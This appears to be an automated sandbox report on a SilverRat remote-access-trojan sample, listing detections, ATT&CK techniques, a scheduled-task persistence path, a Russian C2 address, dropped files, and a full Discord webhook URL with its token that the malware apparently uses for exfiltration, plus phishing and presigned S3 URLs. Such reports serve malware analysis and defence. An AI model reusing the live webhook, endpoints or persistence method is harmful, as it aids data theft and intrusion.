                  Lowering of HIPS / PFW / Operating System Security Settings

                  barindex
                  Yara detected SilverRat
                  Source: Yara matchFile source: YDW0S5K7hi.exe, type: SAMPLE
                  Source: Yara matchFile source: 0.0.YDW0S5K7hi.exe.4b0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.YDW0S5K7hi.exe.3e30b40.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000000.1355697494.00000000004B2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1404296493.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: YDW0S5K7hi.exe PID: 7600, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		Valid Accounts1
                  Command and Scripting Interpreter                  		1
                  Scripting                  		11
                  Process Injection                  		1
                  Masquerading                  		1
                  Input Capture                  		11
                  Security Software Discovery                  		Remote Services1
                  Input Capture                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts21
                  Scheduled Task/Job                  		21
                  Scheduled Task/Job                  		21
                  Scheduled Task/Job                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop Protocol11
                  Archive Collected Data                  		1
                  Non-Standard Port                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Registry Run Keys / Startup Folder                  		1
                  Registry Run Keys / Startup Folder                  		31
                  Virtualization/Sandbox Evasion                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Ingress Tool Transfer                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Deobfuscate/Decode Files or Information                  		LSA Secrets1
                  File and Directory Discovery                  		SSHKeylogging4
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts111
                  Obfuscated Files or Information                  		Cached Domain Credentials13
                  System Information Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555421 Sample: YDW0S5K7hi.exe Startdate: 13/11/2024 Architecture: WINDOWS Score: 100 59 time.windows.com 2->59 61 shed.dual-low.s-part-0017.t-0009.t-msedge.net 2->61 63 2 other IPs or domains 2->63 71 Found malware configuration 2->71 73 Antivirus / Scanner detection for submitted sample 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 7 other signatures 2->77 10 YDW0S5K7hi.exe 1 8 2->10         started        14 $77HelpPanel.exe 3 2->14         started        signatures3 process4 file5 55 C:\Users\user\AppData\...\$77HelpPanel.exe, PE32+ 10->55 dropped 57 C:\Users\user\AppData\...\YDW0S5K7hi.exe.log, CSV 10->57 dropped 87 Uses cmd line tools excessively to alter registry or file data 10->87 16 cmd.exe 1 10->16         started        18 attrib.exe 1 10->18         started        20 attrib.exe 1 10->20         started        signatures6 process7 process8 22 $77HelpPanel.exe 14 3 16->22         started        26 conhost.exe 16->26         started        28 timeout.exe 1 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        dnsIp9 65 109.120.138.54, 49766, 49819, 49865 INFOBOX-ASInfoboxruAutonomousSystemRU Russian Federation 22->65 67 discord.com 162.159.137.232, 443, 49760 CLOUDFLARENETUS United States 22->67 79 Antivirus detection for dropped file 22->79 81 Multi AV Scanner detection for dropped file 22->81 83 Machine Learning detection for dropped file 22->83 85 Uses schtasks.exe or at.exe to add and modify task schedules 22->85 34 powershell.exe 23 22->34         started        37 schtasks.exe 1 22->37         started        39 schtasks.exe 1 22->39         started        41 2 other processes 22->41 signatures10 process11 signatures12 69 Loading BitLocker PowerShell Module 34->69 43 conhost.exe 34->43         started        45 WmiPrvSE.exe 34->45         started        47 conhost.exe 37->47         started        49 conhost.exe 39->49         started        51 conhost.exe 41->51         started        53 conhost.exe 41->53         started        process13

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  YDW0S5K7hi.exe61%ReversingLabsByteCode-MSIL.Backdoor.Crysan
                  YDW0S5K7hi.exe100%AviraHEUR/AGEN.1313069
                  YDW0S5K7hi.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe100%AviraHEUR/AGEN.1313069
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe61%ReversingLabsByteCode-MSIL.Backdoor.Crysan

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://g.top4top.io/p_2522c7w8u1.png0%Avira URL Cloudsafe
                  https://g.top4top.io/p_2522c7w8u0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  discord.com
                  		162.159.137.232
                  		truefalse
                    		high
                    s-part-0017.t-0009.t-msedge.net
                    		13.107.246.45
                    		truefalse
                      		high
                      time.windows.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4vkRdq1c70arvb91az-VPTfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://discord.com$77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003A84000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://discord.com$77HelpPanel.exe, 0000000A.00000002.2615038791.0000000003B26000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://g.top4top.io/p_2522c7w8u$77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://g.top4top.io/p_2522c7w8u1.png$77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://discord.com/api/webhooks/1306009594367180840/Zg6W2rH_yPNkl7Hn5Z-GWjtm8W94xN_PzceHo8g5RjjoNr4$77HelpPanel.exe, 00000015.00000002.1504049880.0000000003181000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameYDW0S5K7hi.exe, 00000000.00000002.1404296493.0000000003E44000.00000004.00000800.00020000.00000000.sdmp, $77HelpPanel.exe, 0000000A.00000002.2615038791.00000000039A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high

                                  World Map of Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public IPs

                                  IPDomainCountryFlagASNASN NameMalicious
                                  162.159.137.232
                                  		discord.comUnited States
                                  		13335CLOUDFLARENETUSfalse
                                  109.120.138.54
                                  		unknownRussian Federation
                                  		30968INFOBOX-ASInfoboxruAutonomousSystemRUtrue

                                  General Information

                                  Joe Sandbox version:41.0.0 Charoite
                                  Analysis ID:1555421
                                  Start date and time:2024-11-13 21:10:09 +01:00
                                  Joe Sandbox product:CloudBasic
                                  Overall analysis duration:0h 5m 45s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                  Number of analysed new started processes analysed:27
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample name:YDW0S5K7hi.exe
                                  renamed because original name is a hash value
                                  Original Sample Name:078f2f65179647c8a6af688be140138eae827e1f.exe
                                  Detection:MAL
                                  Classification:mal100.troj.spyw.evad.winEXE@32/10@2/2
                                  EGA Information:
                                  • Successful, ratio: 66.7%
                                  HCA Information:
                                  • Successful, ratio: 99%
                                  • Number of executed functions: 16
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Found application associated with file extension: .exe

                                  Warnings

                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                  • Excluded IPs from analysis (whitelisted): 20.101.57.9
                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, twc.trafficmanager.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                  • Execution Graph export aborted for target $77HelpPanel.exe, PID 2608 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtCreateKey calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • VT rate limit hit for: YDW0S5K7hi.exe

                                  Simulations

                                  Behavior and APIs

                                  TimeTypeDescription
                                  15:11:22API Interceptor1x Sleep call for process: YDW0S5K7hi.exe modified
                                  15:11:30API Interceptor17x Sleep call for process: powershell.exe modified
                                  21:11:29Task SchedulerRun new task: $77HelpPanel.exe path: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe s>"\$77HelpPanel.exe" /AsAdmin
                                  21:11:29Task SchedulerRun new task: HelpPanel_Task-DAILY-21PM path: %MyFile%

                                  Joe Sandbox View / Context

                                  IPs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  162.159.137.232Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                    CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                      file.exeGet hashmaliciousUnknownBrowse
                                        SecuriteInfo.com.FileRepMalware.22561.28030.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                          570ZenR882.exeGet hashmaliciousUnknownBrowse
                                            Ff0ZjqSI9Y.exeGet hashmaliciousUnknownBrowse
                                              SecuriteInfo.com.Win32.MalwareX-gen.3620.22364.exeGet hashmaliciousUnknownBrowse
                                                EUOgPjsBTC.exeGet hashmaliciousUnknownBrowse
                                                  webhook.ps1Get hashmaliciousUnknownBrowse
                                                    sys_upd.ps1Get hashmaliciousUnknownBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      discord.comdens.exeGet hashmaliciousPython Stealer, Exela Stealer, Waltuhium GrabberBrowse
                                                      • 162.159.128.233
                                                      Xyq6rvzLJs.exeGet hashmaliciousSilverRatBrowse
                                                      • 162.159.137.232
                                                      00514DIRyT.exeGet hashmaliciousGO StealerBrowse
                                                      • 162.159.136.232
                                                      yuki.exeGet hashmaliciousLuna StealerBrowse
                                                      • 162.159.138.232
                                                      CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                      • 162.159.135.232
                                                      CFuejz2dRu.exeGet hashmaliciousDiscord Token StealerBrowse
                                                      • 162.159.137.232
                                                      file.exeGet hashmaliciousGrowtopiaBrowse
                                                      • 162.159.138.232
                                                      file.exeGet hashmaliciousUnknownBrowse
                                                      • 162.159.137.232
                                                      gMd6of50Do.exeGet hashmaliciousBlank GrabberBrowse
                                                      • 162.159.136.232
                                                      El9HaBFrFM.exeGet hashmaliciousBlank GrabberBrowse
                                                      • 162.159.128.233
                                                      s-part-0017.t-0009.t-msedge.net6GViVt34TK.exeGet hashmaliciousSilverRatBrowse
                                                      • 13.107.246.45
                                                      XE5R2scrKo.exeGet hashmaliciousSilverRatBrowse
                                                      • 13.107.246.45
                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                      • 13.107.246.45
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 13.107.246.45
                                                      https://bio.to/Q6knquGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.45
                                                      Launcher 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.45
                                                      https://pthn.airrcofvbc.com/YReXjN/#&lt;EMAIL&gtGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.45
                                                      Play_VM-Now(Jwright)CQDM.htmlGet hashmaliciousHTMLPhisherBrowse
                                                      • 13.107.246.45
                                                      https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                      • 13.107.246.45
                                                      Demande de proposition du Groupe Esp#U00e9rance et Cancer[45838].pdfGet hashmaliciousUnknownBrowse
                                                      • 13.107.246.45

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      CLOUDFLARENETUSnvxdbat.dll.dllGet hashmaliciousLatrodectusBrowse
                                                      • 188.114.96.3
                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                      • 172.64.41.3
                                                      https://phisher-parts-production-us-east-1.s3.amazonaws.com/da08a569-c476-4c06-9e6f-9e3c8ae51232/2024-11-13/am8ltkc1mbphloeu0ibap1mm0rjkho1b9lmvvg81/0a2d8971d2f23f8064ed6608cfd357fab0fafbbe0783e460016281e5880a6058?response-content-disposition=attachment%3B%20filename%3D%22original.eml%22%3B%20filename%2A%3DUTF-8%27%27original.eml&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIA37KREM2QKNAIBCYB%2F20241113%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241113T195010Z&X-Amz-Expires=1295&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEE8aCXVzLWVhc3QtMSJHMEUCIQDes66x%2BvCQrbr4JurBlxh%2FZwoDTCni9uTYWg1yMkw8tgIgTothHdz21wvRLJB%2FyapL2pjSpo6sjfetIsM92xQR7jIqiAQI1%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw4MjMxOTMyNjU4MjQiDABFVf2%2FdFyB4YBlASrcA1V97UHXoaECeX9WNhXaJ66QhShDmzG2%2BnhXoBnvJ9MSZ3FxSKxy2N312vfT0jX%2BE5TYr%2BvMrecn2z2sXImebnwKpWaSE2k3Jnib62DSuxBl%2BPamZXxx2Zqf0KK0B7I5NnPzVFnq7x986hPj38NgaIpxiSisb1KjZdQD4CafHD6wov5qR1J%2BWFsQZpv1lVIX9hrrZbd2TckXngnmqqbL3933Cu9uR2d6fi4Fa%2BodSVQhlyJUJ1fZQ6f7T3JgDGQ1noG0bjKDC268COJJSzXJF5Dk7lpHgMlqYeQ70Hmo3RSB0r6VEbQ1Pbg033wDv8Z%2Bdrm6s8FQuaEdh9ChgB5rug5qXSxc1RTtjRvLnojXQoXRMoGmKYUj%2FduDkSPDQNFR5cHODQjiZFT9IWFxoHk8XJBZXRmTQwiB2TpVzclYAuXORIl9MkLYPp120X6S%2FgCfUlAWZS3Hz9Im%2FhkcTYOiIlUyWPMSReAlGbzLfoT9ND4RJ6usv9EucqIl88Fwkd0ijQf4D3FNYUy2%2BoCu5rSsBMF9rsGkiFUWudPGgjhet3mjcjym4mGGOwYX11H2Pglw%2FABHybbWlRc2CuBjINcCEt0TFuHqO1J2mnw8fpUjMpEwW6o1FShICEc3rDA%2BMKHn0rkGOqUB4xGwEdpTafHkFGGqxzPNpkDcZfnnaU%2FAbOCkGXpyMUhW517qD4FJAmQp%2Bfnl96Tnibf8swoM4SIisjl2jnb%2FU0kq%2BmrN6TFSuMgCgTVQQHcK3ExoKVHLZjrL6%2Bhxh1TzP%2Bpf9ubLwUBMdlqYEKa7N2RQt4hz7n1zW4y%2BMIQEX1vvQuzUBZyYp1XE4j2LT8EAeuznKfcLOqeqoRaUMVe2ofiZ55vf&X-Amz-SignedHeaders=host&X-Amz-Signature=ccc669f52c34a8e1dc4626cae26b2cda7c06245991a7c2f0f6ae3366ae332565Get hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      Launcher 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 104.21.80.55
                                                      https://bio.to/Q6knquGet hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      Launcher 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                      • 172.64.41.3
                                                      https://trckacbm.com/url/ver/714099389/2931216/e7443d1a99daced93ca033af62f22f12Get hashmaliciousUnknownBrowse
                                                      • 104.17.25.14
                                                      https://autoplay-voice-inout-transcribe.github.io/teams.voicemail.assistant/Get hashmaliciousUnknownBrowse
                                                      • 188.114.96.3
                                                      Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exeGet hashmaliciousUnknownBrowse
                                                      • 1.1.1.1
                                                      INFOBOX-ASInfoboxruAutonomousSystemRUbotnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 92.243.83.22
                                                      boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.x86.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.spc.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63
                                                      boatnet.m68k.elfGet hashmaliciousMiraiBrowse
                                                      • 77.221.151.63

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      3b5074b1b5d032e5620f69f9f700ff0e6GViVt34TK.exeGet hashmaliciousSilverRatBrowse
                                                      • 162.159.137.232
                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                      • 162.159.137.232
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 162.159.137.232
                                                      Play_VM-Now(Bfassl)CLQD.htmlGet hashmaliciousUnknownBrowse
                                                      • 162.159.137.232
                                                      Play_VM-Now(Difioreconstruction)CLQD.htmlGet hashmaliciousUnknownBrowse
                                                      • 162.159.137.232
                                                      file.exeGet hashmaliciousLummaCBrowse
                                                      • 162.159.137.232
                                                      Support.Client (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 162.159.137.232
                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                      • 162.159.137.232
                                                      Support.Client (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                      • 162.159.137.232
                                                      https://zillow-online.com/realestate/one/drive/docs/Get hashmaliciousHTMLPhisherBrowse
                                                      • 162.159.137.232

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77HelpPanel.exe.log

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\comserver\$77HelpPanel.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):859
                                                      Entropy (8bit):5.379735105545312
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Khk:MxHKQ71qHGIs0HKCYHKGSI6ok
                                                      MD5:66903BF8F31D4DE1B691C99CF8812A8A
                                                      SHA1:6A49612CB1C2356F176B1B2E5481FB3CD0CB4289
                                                      SHA-256:C09B65A3BA4819DAA12705C8C48400AD8F80B3B779954C14B9679396D252AF42
                                                      SHA-512:A96F5D88E7B7A1C36D77AA9A42CA3513B70261F9B494F387A46F1DA01934E05F9659A0E8512D677DFC8602254C230CC7F370A83B916C329F908B645C5A2C247D
                                                      Malicious:false
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\YDW0S5K7hi.exe.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\YDW0S5K7hi.exe
                                                      File Type:CSV text
                                                      Category:dropped
                                                      Size (bytes):1088
                                                      Entropy (8bit):5.389928136181357
                                                      Encrypted:false
                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/E
                                                      MD5:6B2359BF987F4BDAF6CB014F63217859
                                                      SHA1:3894B16E010FEFF2E71BEE0274746FC34C57C1DF
                                                      SHA-256:ED763CED7BDAE1851B6A82D1D3685E9CC94937ADADD492DD2C1AC0AB639227FD
                                                      SHA-512:C440BE0810F8CF29ADB6E816DA07A673C1E60E926926B2E863AFE7529C2D5EDB6118335C535CD0B4F0F7D7D6E5FE9801328A37FA4012F7D4B737F6F099A1489D
                                                      Malicious:true
                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):64
                                                      Entropy (8bit):1.1510207563435464
                                                      Encrypted:false
                                                      SSDEEP:3:NlllulTkklh:NllUokl
                                                      MD5:8F489B5B8555D6E9737E8EE991AA32FD
                                                      SHA1:05B412B1818DDB95025A6580D9E1F3845F6A2AFC
                                                      SHA-256:679D924F42E8FC107A7BE221DE26CCFEBF98633EA2454D3B4E0D82ED66E3E03D
                                                      SHA-512:97521122A5B64237EF3057A563284AC5C0D3354E8AC5AA0DE2E2FA61BA63379091200D1C4A36FABC16B049E83EF11DBB62E1987A6E4D6A4BCD5DDB27E7BD9F49
                                                      Malicious:false
                                                      Preview:@...e................................................@..........

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05qy5m4h.nvb.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hbkmmegt.bvp.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_orm3ntcg.22l.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
